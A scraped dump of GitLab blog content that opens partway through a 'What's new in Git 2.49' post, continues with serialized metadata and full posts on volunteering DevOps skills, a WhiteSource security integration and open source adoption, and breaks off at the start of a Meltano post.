1.64 KiB | 1.64 MiB/s, done.\n\n[![Build status](https://github.com/git/git/workflows/CI/badge.svg)](https://github.com/git/git/actions?query=branch%3Amaster+event%3Apush)\n\nGit - fast, scalable, distributed revision control system\n=========================================================\n\nGit is a fast, scalable, distributed revision control system with an\nunusually rich command set that provides both high-level operations\nand full access to internals.\n\n[snip]\n```\n\nAs you can see above, Git first talks to the remote repository to download the blob before\nit can display it.\n\nWhen you would like to `git-blame(1)` that file, it needs to download a lot\nmore:\n\n```sh\n$ git blame HEAD README.md\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\n\n[snip]\n\ndf7375d772 README.md (Ævar Arnfjörð Bjarmason 2021-11-23 17:29:09 +0100  1) [![Build status](https://github.com/git/git/workflows/CI/badge.svg)](https://github.com/git/git/actions?query=branch%3Amaster+event%3Apush)\n5f7864663b README.md (Johannes Schindelin \t2019-01-29 06:19:32 -0800  2)\n28513c4f56 README.md (Matthieu Moy        \t2016-02-25 09:37:29 +0100  3) Git - fast, scalable, distributed revision control system\n28513c4f56 README.md (Matthieu Moy        \t2016-02-25 09:37:29 +0100  4) =========================================================\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  5)\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  6) Git is a fast, scalable, distributed revision control system with an\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  7) unusually rich command set that provides both high-level operations\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  8) and full access to internals.\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  9)\n\n[snip]\n```\n\nWe've truncated the output, but as you can see, Git goes to the server for each\nrevision of that file separately. That's really inefficient. With\n`git-backfill(1)` we can ask Git to download all blobs:\n\n```shell\n$ git backfill\nremote: Enumerating objects: 50711, done.\nremote: Counting objects: 100% (15438/15438), done.\nremote: Compressing objects: 100% (708/708), done.\nremote: Total 50711 (delta 15154), reused 14730 (delta 14730), pack-reused 35273 (from 1)\nReceiving objects: 100% (50711/50711), 11.62 MiB | 12.28 MiB/s, done.\nResolving deltas: 100% (49154/49154), done.\nremote: Enumerating objects: 50017, done.\nremote: Counting objects: 100% (10826/10826), done.\nremote: Compressing objects: 100% (634/634), done.\nremote: Total 50017 (delta 10580), reused 10192 (delta 10192), pack-reused 39191 (from 1)\nReceiving objects: 100% (50017/50017), 12.17 MiB | 12.33 MiB/s, done.\nResolving deltas: 100% (48301/48301), done.\nremote: Enumerating objects: 47303, done.\nremote: Counting objects: 100% (7311/7311), done.\nremote: Compressing objects: 100% (618/618), done.\nremote: Total 47303 (delta 7021), reused 6693 (delta 6693), pack-reused 39992 (from 1)\nReceiving objects: 100% (47303/47303), 40.84 MiB | 15.26 MiB/s, done.\nResolving deltas: 100% (43788/43788), done.\n```\n\nThis backfills all blobs, turning the blobless clone into a full clone:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype)' | sort | uniq -c\n 148031 blob\n  83977 commit\n 161927 tree\n```\n\nThis [project](https://lore.kernel.org/git/pull.1820.v3.git.1738602667.gitgitgadget@gmail.com/)\nwas led by [Derrick Stolee](https://stolee.dev/) and was merged with\n[e565f37553](https://gitlab.com/gitlab-org/git/-/commit/e565f3755342caf1d21e22359eaf09ec11d8c0ae).\n\n## Introduction of zlib-ng\n\nAll objects in the `.git/` folder are compressed by Git using [`zlib`](https://zlib.net/). `zlib` is the reference implementation for the [RFC\n1950](https://datatracker.ietf.org/doc/html/rfc1950): ZLIB Compressed Data\nFormat. Created in 1995, `zlib` has a long history and is incredibly\nportable, even supporting many systems that predate the Internet. Because of its\nwide support of architectures and compilers, it has limitations in what it is\ncapable of.\n\nThe fork [`zlib-ng`](https://github.com/zlib-ng/zlib-ng) was created to\naccommodate the limitations. `zlib-ng` aims to be optimized for modern\nsystems. This fork drops support for legacy systems and instead brings in\npatches for Intel optimizations, some Cloudflare optimizations, and a couple\nother smaller patches.\n\nThe `zlib-ng` library itself provides a compatibility layer for `zlib`. The\ncompatibility later allows `zlib-ng` to be a drop-in replacement for `zlib`, but\nthat layer is not available on all Linux distributions. In Git 2.49:\n\n- A compatibility layer was added to the Git project.\n- Build options were added to both to the [`Makefile`](https://gitlab.com/gitlab-org/git/-/blob/b9d6f64393275b505937a8621a6cc4875adde8e0/Makefile#L186-187)\n  and [Meson Build file](https://gitlab.com/gitlab-org/git/-/blob/b9d6f64393275b505937a8621a6cc4875adde8e0/meson.build#L795-811).\n\nThese additions make it easier to benefit from the performance improvements of\n`zlib-ng`.\n\nIn local benchmarks, we've seen a ~25% speedup when using `zlib-ng` instead of `zlib`. And we're in the process of rolling out these changes to\nGitLab.com, too.\n\nIf you want to benefit from the gains of `zlib-ng`, first verify if Git\non your machine is already using `zlib-ng` by running\n`git version --build-options`:\n\n```shell\n$ git version --build-options\ngit version 2.47.1\ncpu: x86_64\nno commit associated with this build\nsizeof-long: 8\nsizeof-size_t: 8\nshell-path: /bin/sh\nlibcurl: 8.6.0\nOpenSSL: OpenSSL 3.2.2 4 Jun 2024\nzlib: 1.3.1.zlib-ng\n```\n\nIf the last line includes `zlib-ng` then your Git is already built\nusing the faster `zlib` variant. If not, you can either:\n\n- Ask the maintainer of the Git package you are using to include `zlib-ng` support.\n- Build Git yourself from source.\n\nThese [changes](https://gitlab.com/gitlab-org/git/-/commit/9d0e81e2ae3bd7f6d8a655be53c2396d7af3d2b0)\nwere [introduced](https://lore.kernel.org/git/20250128-b4-pks-compat-drop-uncompress2-v4-0-129bc36ae8f5@pks.im/)\nby [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Continued iteration on Meson\n\nIn our article about the Git 2.48 release,\nwe touched on [the introduction of the Meson build system](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/#meson-build-system). [Meson](https://en.wikipedia.org/wiki/Meson_(software)) is\na build automation tool used by the Git project that at some point might replace [Autoconf](https://en.wikipedia.org/wiki/Autoconf),\n[CMake](https://en.wikipedia.org/wiki/CMake), and maybe even\n[Make](https://en.wikipedia.org/wiki/Make_(software)).\n\nDuring this release cycle, work continued on using Meson, adding various missing\nfeatures and stabilization fixes:\n\n  - [Improved test coverage for\n\tCI](https://lore.kernel.org/git/20250122-b4-pks-meson-additions-v3-0-5a51eb5d3dcd@pks.im/)\n\twas merged in\n\t[72f1ddfbc9](https://gitlab.com/gitlab-org/git/-/commit/72f1ddfbc95b47c6011bb423e6947418d1d72709).\n  - [Bits and pieces to use Meson in `contrib/`](https://lore.kernel.org/git/20250219-b4-pks-meson-contrib-v2-0-1ba5d7fde0b9@pks.im/)\n\twere merged in\n\t[2a1530a953](https://gitlab.com/gitlab-org/git/-/commit/2a1530a953cc4d2ae62416db86c545c7ccb73ace).\n  - [Assorted fixes and improvements to the build procedure based on\n\tmeson](https://lore.kernel.org/git/20250226-b4-pks-meson-improvements-v3-0-60c77cf673ae@pks.im/)\n\twere merged in\n\t[ab09eddf60](https://gitlab.com/gitlab-org/git/-/commit/ab09eddf601501290b5c719574fbe6c02314631f).\n  - [Making Meson aware of building\n\t`git-subtree(1)`](https://lore.kernel.org/git/20250117-b4-pks-build-subtree-v1-0-03c2ed6cc42e@pks.im/)\n\twas merged in\n\t[3ddeb7f337](https://gitlab.com/gitlab-org/git/-/commit/3ddeb7f3373ae0e309d9df62ada24375afa456c7).\n  - [Learn Meson to generate HTML documentation\n\tpages](https://lore.kernel.org/git/20241227-b4-pks-meson-docs-v2-0-f61e63edbfa1@pks.im/)\n\twas merged in\n\t[1b4e9a5f8b](https://gitlab.com/gitlab-org/git/-/commit/1b4e9a5f8b5f048972c21fe8acafe0404096f694).\n\nAll these efforts were carried out by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Deprecation of .git/branches/ and .git/remotes/\n\nYou are probably aware of the existence of the `.git` directory, and what is\ninside. But have you ever heard about the sub-directories `.git/branches/` and\n`.git/remotes/`? As you might know, reference to branches are stored in\n`.git/refs/heads/`, so that's not what `.git/branches/` is for, and what about\n`.git/remotes/`?\n\nWay back in 2005, [`.git/branches/`](https://git-scm.com/docs/git-fetch#_named_file_in_git_dirbranches)\nwas introduced to store a shorthand name for a remote, and a few months later they were\nmoved to [`.git/remotes/`](https://git-scm.com/docs/git-fetch#_named_file_in_git_dirremotes).\nIn [2006](https://lore.kernel.org/git/Pine.LNX.4.63.0604301520460.2646@wbgn013.biozentrum.uni-wuerzburg.de/),\n[`git-config(1)`](https://git-scm.com/docs/git-config) learned to store\n[remotes](https://git-scm.com/docs/git-config#Documentation/git-config.txt-remoteltnamegturl).\nThis has become the standard way to configure remotes and, in 2011, the\ndirectories `.git/branches/` and `.git/remotes/` were\n[documented](https://gitlab.com/git-scm/git/-/commit/3d3d282146e13f2d7f055ad056956fd8e5d7ed29#e615263aaf131d42be8b0d0888ebd3fec954c6c9_132_124)\nas being \"legacy\" and no longer used in modern repositories.\n\nIn 2024, the document [BreakingChanges](https://git-scm.com/docs/BreakingChanges)\nwas started to outline breaking changes for the next major version of Git\n(v3.0). While this release is not planned to happen any time soon, this document\nkeeps track of changes that are expected to be part of that release.\nIn [8ccc75c245](https://gitlab.com/git-scm/git/-/commit/8ccc75c2452b5814d2445d60d54266293ca48674),\nthe use of the directories `.git/branches/` and `.git/remotes/` was added to\nthis document and that officially marks as them deprecated and to be removed in\nGit 3.0.\n\nThanks to [Patrick Steinhardt](https://gitlab.com/pks-gitlab) for\n[formalizing this deprecation](https://lore.kernel.org/git/20250122-pks-remote-branches-deprecation-v4-5-5cbf5b28afd5@pks.im/).\n\n## Rust bindings for libgit\n\nWhen compiling Git, an internal library `libgit.a` is made. This library\ncontains some of the core functionality of Git.\n\nWhile this library (and most of Git) is written in C, in Git 2.49 bindings were\nadded to make some of these functions available in Rust. To achieve this, two\nnew Cargo packages were created: `libgit-sys` and `libgit-rs`. These packages\nlive in the [`contrib/`](https://gitlab.com/gitlab-org/git/-/tree/master/contrib) subdirectory in the Git source tree.\n\nIt's pretty\n[common](https://doc.rust-lang.org/cargo/reference/build-scripts.html#-sys-packages)\nto split out a library into two packages when a [Foreign Function\nInterface](https://en.wikipedia.org/wiki/Foreign_function_interface) is used.\nThe `libgit-sys` package provides the pure interface to C functions and links to\nthe native `libgit.a` library. The package `libgit-rs` provides a high-level\ninterface to the functions in `libgit-sys` with a feel that is more idiomatic to\nRust.\n\nSo far, the functionality in these Rust packages is very limited. It only\nprovides an interface to interact with the `git-config(1)`.\n\nThis initiative was led by [Josh Steadmon](https://lore.kernel.org/git/8793ff64a7f6c4c04dd03b71162a85849feda944.1738187176.git.steadmon@google.com/) and was merged with [a4af0b6288](https://gitlab.com/gitlab-org/git/-/commit/a4af0b6288e25eb327ae9018cee09def9e43f1cd).\n\n## New name-hashing algorithm\n\nThe Git object database in `.git/` stores most of its data in packfiles. And\npackfiles are also used to submit objects between Git server and client over the\nwire.\n\nYou can read all about the format at\n[`gitformat-pack(5)`](https://git-scm.com/docs/gitformat-pack). One important\naspect of the packfiles is delta-compression. With delta-compression not every\nobject is stored as-is, but some objects are saved as a _delta_ of another\n_base_. So instead of saving the full contents of the objects, changes compared\nto another object are stored.\n\nWithout going into the details how these deltas are calculated or stored, you\ncan imagine that it is important group files together that are very similar. In\nv2.48 and earlier, Git looked at the last 16 characters of the path name to\ndetermine whether blobs might be similar. This algorithm is named version `1`.\n\nIn Git 2.49, version `2` is available. This is an iteration on version `1`, but\nmodified so the effect of the parent directory is reduced. You can specify the\nname-hash algorithm version you want to use with option `--name-hash-version` of\n[`git-repack(1)`](https://git-scm.com/docs/git-repack).\n\n[Derrick Stolee](https://stolee.dev/), who drove this project, did some\ncomparison in resulting packfile size after running `git repack -adf\n--name-hash-version=\u003Cn>`:\n\n| Repo                                          \t| Version 1 size   | Version 2 size |\n|---------------------------------------------------|-----------|---------|\n| [fluentui](https://github.com/microsoft/fluentui) | 440 MB \t| 161 MB   |\n| Repo B                                        \t| 6,248 MB   | 856 MB   |\n| Repo C                                        \t| 37,278 MB  | 6,921 MB |\n| Repo D                                        \t| 131,204 MB | 7,463 MB |\n\nYou can read more of the details in the [patch\nset](https://lore.kernel.org/git/pull.1823.v4.git.1738004554.gitgitgadget@gmail.com/),\nwhich is merged in\n[aae91a86fb](https://gitlab.com/gitlab-org/git/-/commit/aae91a86fb2a71ff89a71b63ccec3a947b26ca51).\n\n## Promisor remote capability\n\nIt's known that Git isn't great in dealing with large files. There are some\nsolutions to this problem, like [Git LFS](https://git-lfs.com/), but there are\nstill some shortcomings. To give a few:\n\n- With Git LFS the user has to configure which files to put in LFS. The server has\n  no control about that and has to serve all files.\n- Whenever a file is committed to the repository, there is no way to get it out\n  again without rewriting history. This is annoying, especially for large files,\n  because they are stuck for eternity.\n- Users cannot change their mind on which files to put into Git LFS.\n- A tool like Git LFS requires significant effort to set up, learn, and use\n  correctly.\n\nFor some time, Git has had the concept of promisor remotes. This feature can be used to deal with large files, and in Git 2.49 this feature took a step forward.\n\nThe idea for the new “promisor-remote” capability is relatively simple: Instead of sending all\nobjects itself, a Git server can tell to the Git client \"Hey, go download these\nobjects from _XYZ_\". _XYZ_ would be a promisor remote.\n\nGit 2.49 enables the server to advertise the information of the promisor remote\nto the client. This change is an extension to\n[`gitprotocol-v2`](https://git-scm.com/docs/gitprotocol-v2). While the server\nand the client are transmitting data to each other, the server can send  names and URLs of the promisor remotes it knows\nabout.\n\nSo far, the client is not using the promisor remote info it gets from the server during clone, so all\nobjects are still transmitted from the remote the clone initiated from. We are planning to continue work on this feature, making it use promisor remote info from the server, and making it easier to use.\n\nThis [patch\nset](https://lore.kernel.org/git/20250218113204.2847463-1-christian.couder@gmail.com/)\nwas submitted by [Christian Couder](https://gitlab.com/chriscool) and merged\nwith\n[2c6fd30198](https://gitlab.com/gitlab-org/git/-/commit/2c6fd30198187c928cbf927802556908c381799c).\n\n## Thin clone using `--revision`\n\nA new `--revision` option was added to\n[`git-clone(1)`](https://git-scm.com/docs/git-clone). This enables you to create\na thin clone of a repository that only contains the history of the given\nrevision. The option is similar to `--branch`, but accepts a ref name (like\n`refs/heads/main`, `refs/tags/v1.0`, and `refs/merge-requests/123`) or a\nhexadecimal commit object ID. The difference to `--branch` is that it does not\ncreate a tracking branch and detaches `HEAD`. This means it's not suited if you\nwant to contribute back to that branch.\n\nYou can use `--revision` in combination with `--depth` to create a very minimal\nclone. A suggested use-case is for automated testing. When you have a CI system\nthat needs to check out a branch (or any reference) to perform autonomous\ntesting on the source code, having a minimal clone is all you need.\n\nThis\n[change](https://gitlab.com/gitlab-org/git/-/commit/5785d9143bcb3ef19452a83bc2e870ff3d5ed95a)\nwas\n[driven](https://lore.kernel.org/git/20250206-toon-clone-refs-v7-0-4622b7392202@iotcl.com/)\nby [Toon Claes](https://gitlab.com/toon).\n\n# Read more\n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)\n- [What’s new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)",[267,9,751],{"slug":5383,"featured":91,"template":689},"whats-new-in-git-2-49-0","content:en-us:blog:whats-new-in-git-2-49-0.yml","Whats New In Git 2 49 0","en-us/blog/whats-new-in-git-2-49-0.yml","en-us/blog/whats-new-in-git-2-49-0",{"_path":5389,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5390,"content":5396,"config":5401,"_id":5403,"_type":14,"title":5404,"_source":16,"_file":5405,"_stem":5406,"_extension":19},"/en-us/blog/where-to-donate-your-devops-skills",{"title":5391,"description":5392,"ogTitle":5391,"ogDescription":5392,"noIndex":6,"ogImage":5393,"ogUrl":5394,"ogSiteName":673,"ogType":674,"canonicalUrls":5394,"schema":5395},"Where to donate your DevOps skills","Want to feel great and help fill the DevOps talent pipeline? Here are some rewarding opportunities to donate your tech knowledge to others.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683269/Blog/Hero%20Images/clark-tibbs-oqstl2l5oxi-unsplash.jpg","https://about.gitlab.com/blog/where-to-donate-your-devops-skills","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Where to donate your DevOps skills\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2021-12-08\",\n      }",{"title":5391,"description":5392,"authors":5397,"heroImage":5393,"date":5398,"body":5399,"category":1078,"tags":5400},[862],"2021-12-08","\n\nYour technical knowledge could be a gift to someone else. Nonprofits around the world are seeking talented professionals to mentor, volunteer their technical skills, or teach courses in-person and online. The donations of your time and expertise could change the lives of people in your community or halfway around the world. The more access underrepresented groups, including women and minorities, have to skills development and mentoring that lead to higher-paying jobs, the better their chances of rising up out of difficult socio-economic conditions. And don’t forget, volunteering is incredibly rewarding.\n\nHere are six organizations and tech communities that could benefit from your skills and experience: \n\n## [Outreachy](https://www.outreachy.org/)\n\nOutreachy provides internships in open source to people subject to systemic bias and impacted by underrepresentation in the technical industry where they are living. Outreachy interns work with experienced mentors from open source communities. Internship projects may include programming, user experience, documentation, graphical design, data science, marketing, user advocacy, or community event planning.\n\nGitLab has participated in the Outreachy internship program, which intersects with our [Diversity, Inclusion, and Belonging](https://handbook.gitlab.com/handbook/values/#diversity-inclusion) value. Our team, including Senior Backend Engineer [Christian Couder](https://gitlab.com/chriscool), wrote [about their experience](https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020/): “One of the benefits of the Outreachy technology internship is that the interns do not need to be students. It's a great opportunity for people who are coming back into the workforce after a hiatus, or who are navigating a career change into tech. This technology internship program is unique because it incorporates skill sets beyond engineering – which creates a broader range of skill sets represented in the open source world. The Outreachy internship is remote, making it more relevant than ever during the pandemic by helping interns gain experience working on an all-remote team.”\n\n## [CodeYourFuture](https://codeyourfuture.io/)\n\nCodeYourFuture is a U.K.-based nonprofit that trains “some of the most deprived members of society” to become web developers and helps them to find work in the tech industry. Students are trained in full-stack web development by volunteers from the tech industry, putting a strong emphasis on collaboration and product development through tech projects.\n\nSenior Frontend Engineer [Coung Ngo](https://gitlab.com/cngo) contributes his time to the nonprofit and says that while DevOps is not in the syllabus, the underlying skill sets are. “They teach a full-stack course of HTML, CSS, JS, React, Node, and SQL/MongoDB,” Ngo says. “It's a nice community, so if someone lives in London, Glasgow, Manchester, or Birmingham, it's enjoyable to join in with the in-person classes.”\n\n## [WeThinkCode](https://www.wethinkcode.co.za/about)\n\nWeThinkCode is a nonprofit aimed at closing the skills gap in the digital sector in South Africa and preparing young people to participate in the region’s economy. The organization believes that South Africa’s youth represent a pool of talent that mostly remains untapped and wants to provide businesses with access to this source of tech talent. Nonprofits like WeThinkCode are important because of the way they mobilize previously underestimated groups by providing an avenue for education where traditional paths are often more closed off. \n\nWeThinkCode was a GitLab donation recipient and the organization utilizes GitLab’s free SaaS version in their curriculum. The organization has [four ways for professionals to volunteer](https://www.wethinkcode.co.za/volunteer), including virtual opportunities:\n\n- Mentorship - Experienced software development practitioners provide guidance to a group of four to six students on communication, ways of working, insights on tackling programming challenges in the curriculum, and tips on the conduct expected in the workplace. \n \n- Interview readiness - Practitioners with experience in hiring and recruiting will help conduct mock interviews and then provide constructive feedback.\n\n- WomenThinkCode Meetups - Women in tech to act as role models and deliver talks about their career journeys covering tech and interpersonal aspects.\n\n- Community-hosted talks - Practitioners deliver talks on the real-world application of various technologies.\n\n## [KodewithKlossy](https://www.kodewithklossy.com/)\n\nKodewithKlossy is a nonprofit with the mission to create learning experiences and opportunities for young women and nonbinary individuals that increase their confidence and inspire them to pursue their passions in a technology-driven world. KodewithKlossy found that prior to camp, only two out of 10 attendees (also called scholars) had computer science experience and after, as a result of their camp experience, nine in 10 say they plan to pursue education and opportunities in computer science. Volunteers can serve as role models in the camp speaker series or participate in other important ways.\n\n## [Google Summer of Code](https://summerofcode.withgoogle.com/archive/)\n\nGoogle Summer of Code (GSoC) is a global program focused on bringing more student developers into open source software development. Students work on a three-month programming project with an open source organization during their break from university. \n\nIn 2022, Google will [expand its GSOC enrollment](https://opensource.googleblog.com/2021/11/expanding-google-summer-of-code-in-2022.html) beyond students to include all newcomers to open source who are 18 years and older. Google states, “We realize there are many folks that could benefit from the GSoC program that are at various stages of their career, recent career changers, self-taught, those returning to the workforce, etc. so we wanted to allow these folks the opportunity to participate in GSoC.”\n\nGitLab [participated this year](https://summerofcode.withgoogle.com/archive/2021/organizations/5396515480141824/), helping to mentor students, and Couder has been a mentor since 2008.\n\n## Open source communities\n\nOpen source communities like Cloud Native Computing Foundation [(CNCF)](https://www.cncf.io/), which include students and people who are changing careers, are a fantastic outlet to share your DevOps expertise. You can help other community members improve their features or applications, learn about documentation, learn new languages, and uncover bugs. Senior Developer Evangelist [Michael Friedrich](https://gitlab.com/dnsmichi) says it is rewarding to become a mentor in open source communities. “It is important to be honest, but also to be patient and kind. Don’t say something is easy – it’s not easy for that person. Instead, make sure to share your expertise in a constructive and helpful way,” he adds. Listen to more of Friedrich’s [advice for open source contributions](https://www.youtube.com/watch?v=yT63olXdS-I).\n\n_Cover image by Clark Tibbs via [Unsplash](https://unsplash.com/)._\n",[685,9,267],{"slug":5402,"featured":6,"template":689},"where-to-donate-your-devops-skills","content:en-us:blog:where-to-donate-your-devops-skills.yml","Where To Donate Your Devops Skills","en-us/blog/where-to-donate-your-devops-skills.yml","en-us/blog/where-to-donate-your-devops-skills",{"_path":5408,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5409,"content":5415,"config":5420,"_id":5422,"_type":14,"title":5423,"_source":16,"_file":5424,"_stem":5425,"_extension":19},"/en-us/blog/whitesource-gitlab-security-integration",{"title":5410,"description":5411,"ogTitle":5410,"ogDescription":5411,"noIndex":6,"ogImage":5412,"ogUrl":5413,"ogSiteName":673,"ogType":674,"canonicalUrls":5413,"schema":5414},"GitLab and WhiteSource: the easy way to secure your open source code","How we integrated with GitLab's security dashboards to make it easier to secure your open source code earlier in the dev lifecycle","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681016/Blog/Hero%20Images/gitlab-whitesource.png","https://about.gitlab.com/blog/whitesource-gitlab-security-integration","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and WhiteSource: the easy way to secure your open source code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Guy Bar-Gil, Product Manager at WhiteSource\"}],\n        \"datePublished\": \"2020-01-14\",\n      }",{"title":5410,"description":5411,"authors":5416,"heroImage":5412,"date":1178,"body":5418,"category":10,"tags":5419},[5417],"Guy Bar-Gil, Product Manager at WhiteSource","\n\nDevelopment teams have gotten used to relying on open source components to build powerful innovative software at a neck-breaking pace. The speed is certainly accelerating, but what about the security of our applications? Unfortunately, this is often treated as an afterthought, which is not surprising since security has traditionally been seen as a tiresome and time-consuming task that comes after the development stage and slows down production.\n\nIn an attempt to keep security up to speed with the pace of development, organizations are realizing that it can no longer be introduced in the later stages of the software development lifecycle (SDLC). Instead, fusing security into the earlier stages of the SDLC can enable development teams to detect and remediate vulnerabilities when they are significantly easier, quicker and cheaper to fix.\n\nBut how can we integrate security into our development process without adding more work and slowing down our pace?\n\nWell that's where GitLab and WhiteSource come in.\n\n## Secure open source code while in your GitLab UI\n\nWhiteSource has leveraged GitLab's Open Core to empower developers with the tools needed to find and fix open source vulnerabilities. The integration provides developer-focused security tools that operate within the native coding environment and within the [GitLab CI/CD pipeline](/topics/ci-cd/), allowing them to continuously address security without having to compromise on agility.\n\nWith the newest integration to GitLab Ultimate, developers gain richer insight into vulnerable open source components discovered by WhiteSource right in the merge request pipeline. At the same time security pros can see this in the GitLab Security Dashboard alongside scan results from SAST, DAST, containers, and license compliance. WhiteSource supports many more languages and provides richer dependency insight than GitLab alone. With GitLab, both security users and developers can see new, unresolved vulnerabilities for every code commit, with actionable insights on vulnerable open source libraries as well as all of their dependencies as soon as they are added to their projects.\n\n## Ensuring a secure future, together\n\nWith our partnership, we want to ensure that developers are able to harness the power of open source to create innovative products without having to compromise on security, speed, or agility.\n\n## So, what's next?\n\nVery soon, we'll be sharing a blog post with a step-by-step guide on how to integrate WhiteSource into your native GitLab environment. The best tips and tricks will be included to ensure you'll be able to secure your open source components freely and fearlessly.\n",[231,9,865],{"slug":5421,"featured":6,"template":689},"whitesource-gitlab-security-integration","content:en-us:blog:whitesource-gitlab-security-integration.yml","Whitesource Gitlab Security Integration","en-us/blog/whitesource-gitlab-security-integration.yml","en-us/blog/whitesource-gitlab-security-integration",{"_path":5427,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5428,"content":5433,"config":5438,"_id":5440,"_type":14,"title":5441,"_source":16,"_file":5442,"_stem":5443,"_extension":19},"/en-us/blog/why-choose-open-source",{"title":5429,"description":5430,"ogTitle":5429,"ogDescription":5430,"noIndex":6,"ogImage":1892,"ogUrl":5431,"ogSiteName":673,"ogType":674,"canonicalUrls":5431,"schema":5432},"Why more companies are adopting open source technology","The results are in – our 2016 Global Developer Survey revealed that open source tools are most preferred by developers the world over. Why?","https://about.gitlab.com/blog/why-choose-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why more companies are adopting open source technology\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-03-03\",\n      }",{"title":5429,"description":5430,"authors":5434,"heroImage":1892,"date":5435,"body":5436,"category":10,"tags":5437},[1859],"2017-03-03","\n98 percent of developers use open source tools – even when they’re not supposed to! Here’s why.\n\n\u003C!-- more -->\n\nOur [Global Developer Report](https://page.gitlab.com/2016-developer-survey_2016-developer-survey.html) explores how developers’ methods are changing, and how businesses can adapt to get the best out of their development teams. More than half of our respondents identified as developer or engineer, giving us insight into what matters to developers, how they work and what tools they choose. To see what our research revealed, you can [download the full report](https://page.gitlab.com/2016-developer-survey_2016-developer-survey.html) to learn more about what today’s developers want.\n\n## Why open source is preferred\n\nNearly three-quarters of our survey respondents said that they chose to work with GitLab because it’s open source. So why is [open source](/solutions/open-source/) so popular?\n\n### Software evolves faster\n\nWith roots in the open source community, software is able to evolve quickly, with bugs detected and fixed rapidly by members of that community. This reduces the time spent waiting for fixes to be rolled out – a good case for why the majority of our survey respondents say that more than half of the tools they use are open source.\n\n![How much open source is used](https://about.gitlab.com/images/blogimages/open-source-tools-graph.png){: .shadow}\u003Cbr>\n\n### You know what you’re getting\n\nOpen source software is also considered more trustworthy: with source code open and available to inspect, developers can see for themselves exactly what it does. They can verify whether or not it's secure and introduce fixes and improvements if necessary.\n\n### You can adapt it yourself\n\nIf developers want to adapt a feature or add something that will make their jobs easier, they have the freedom to do so without relying on the software vendor to make the change. Open source also makes it easier to integrate different software products to suit the needs of the business.\n\n## Developers overwhelmingly choose open source\n\nSenior leadership only selects tools for their teams less than 20 percent of the time, and 11 percent of developers still choose to use their own open source tools, despite what their managers say. This poses a risk to companies insisting on closed source solutions for their developer teams: it compromises your ‘single source of truth’, risks team happiness and cohesion, and wastes resources spent on unused tools.\n\n![Who chooses development tools](https://about.gitlab.com/images/blogimages/who-in-org-decides-tools-graph.png){: .shadow}\u003Cbr>\n\nThe message is clear: when developers have the freedom to choose their tools (and sometimes even when they don’t!), they choose open source – maybe it’s time your company did too.\n\nImage: “[brooklyn sign](https://www.flickr.com/photos/petemccarthy/6866996865)” by [Peter McCarthy](https://www.flickr.com/photos/petemccarthy/) is licensed under [CC BY-ND 2.0](https://creativecommons.org/licenses/by-nd/2.0/)\n{: .note}\n",[9],{"slug":5439,"featured":6,"template":689},"why-choose-open-source","content:en-us:blog:why-choose-open-source.yml","Why Choose Open Source","en-us/blog/why-choose-open-source.yml","en-us/blog/why-choose-open-source",{"_path":5445,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5446,"content":5451,"config":5457,"_id":5459,"_type":14,"title":5460,"_source":16,"_file":5461,"_stem":5462,"_extension":19},"/en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines",{"title":5447,"description":5448,"ogTitle":5447,"ogDescription":5448,"noIndex":6,"ogImage":1007,"ogUrl":5449,"ogSiteName":673,"ogType":674,"canonicalUrls":5449,"schema":5450},"Why GitLab is building Meltano, an open source platform for ELT pipelines","Our goal is to make the power of data integration available to all by building a true open source alternative to existing proprietary hosted ELT solutions.","https://about.gitlab.com/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why GitLab is building Meltano, an open source platform for ELT pipelines\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Douwe Maan\"}],\n        \"datePublished\": \"2020-05-18\",\n      }",{"title":5447,"description":5448,"authors":5452,"heroImage":1007,"date":5454,"body":5455,"category":951,"tags":5456},[5453],"Douwe Maan","2020-05-18","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThis post was originally 